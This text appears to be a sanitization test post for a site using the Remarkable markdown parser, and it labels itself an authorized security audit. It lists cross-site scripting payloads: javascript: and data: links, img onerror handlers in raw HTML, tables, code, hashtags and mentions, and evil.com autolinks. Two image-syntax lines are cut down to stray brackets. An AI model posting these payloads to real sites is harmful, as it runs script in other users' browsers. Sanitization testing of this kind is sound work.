Authorized security audit - testing sanitization of payloads when Remarkable markdown parser is active.
Testing javascript: and data: URIs in markdown links:
[click](javascript:alert('md-link'))
[click](data:text/html,alert('md-data'))
Testing injection via markdown image syntax:
)
)
Testing raw HTML tags within markdown context:
<img src=x onerror=alert('md-raw-img')>
Testing code block and inline code:
alert('code-block')
Inline code with HTML: <img src=x onerror=alert('inline-code')>
Testing HTML injection in markdown tables:
| header |
|---|
| <img src=x onerror=alert('md-table')> |
Testing injection via hashtag and mention parsing:
#<img src=x onerror=alert('hashtag')>
@<img src=x onerror=alert('mention')>
Testing injection via URL auto-detection:
https://evil.com/"onmouseover="alert('autolink')
https://evil.com/<img src=x onerror=alert('autolink-img')>
This post is part of an authorized security audit. All payloads are for testing sanitization only.